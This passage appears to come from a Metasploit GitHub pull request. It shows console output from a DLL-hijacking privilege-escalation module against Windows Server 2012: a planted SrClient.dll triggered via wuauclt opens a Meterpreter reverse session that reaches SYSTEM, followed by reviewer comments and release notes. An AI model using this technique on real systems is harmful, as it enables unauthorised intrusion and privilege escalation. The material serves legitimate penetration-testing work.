[*] 
[*] 	Everyone
[*] 	BUILTIN\Users
[*] 	NT AUTHORITY\INTERACTIVE
[*] 	CONSOLE LOGON
[*] 	NT AUTHORITY\Authenticated Users
[*] 	NT AUTHORITY\This Organization
[*] 	LOCAL
[*] 	NT AUTHORITY\NTLM Authentication
[*] 
[*] Checking for writable directories in %PATH%...
[*] 
[*] 	Checking permissions for %SystemRoot%\system32
[*] 	Checking permissions for %SystemRoot%
[*] 	Checking permissions for %SystemRoot%\System32\Wbem
[*] 	Checking permissions for %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
[*] 	Checking permissions for C:\users\msfuser
[*] 
[+] WIN-8AOTFCRKDQ0\msfuser has write permissions to the following %PATH% directories:
[*] 
[*] 	C:\users\msfuser
[*] 
[+] The target appears to be vulnerable.
[*] Writing 8704 bytes to C:\users\msfuser\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (200262 bytes) to 192.168.134.140
[*] Meterpreter session 4 opened (192.168.135.197:4444 -> 192.168.134.140:49162) at 2021-03-12 14:02:47 -0600

meterpreter > sysinfo
Computer        : WIN-8AOTFCRKDQ0
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


@ErikWynter
Contributor Author

The latest commit removes that unnecessary comment and updates the documentation to mention the WAIT_FOR_TIWORKER option. Let me know if any further changes are needed :)

@bwatters-r7 bwatters-r7 merged commit ae5d31c into rapid7:master Mar 15, 2021
@bwatters-r7
Contributor

bwatters-r7 commented Mar 15, 2021

Release Notes

New module exploits/windows/local/srclient_dll_hijacking achieves privilege escalation via a DLL hijacking vulnerability in Windows Server 2012 (relies on a user misconfiguration of the path environment variable).

@pbarry-r7 pbarry-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 17, 2021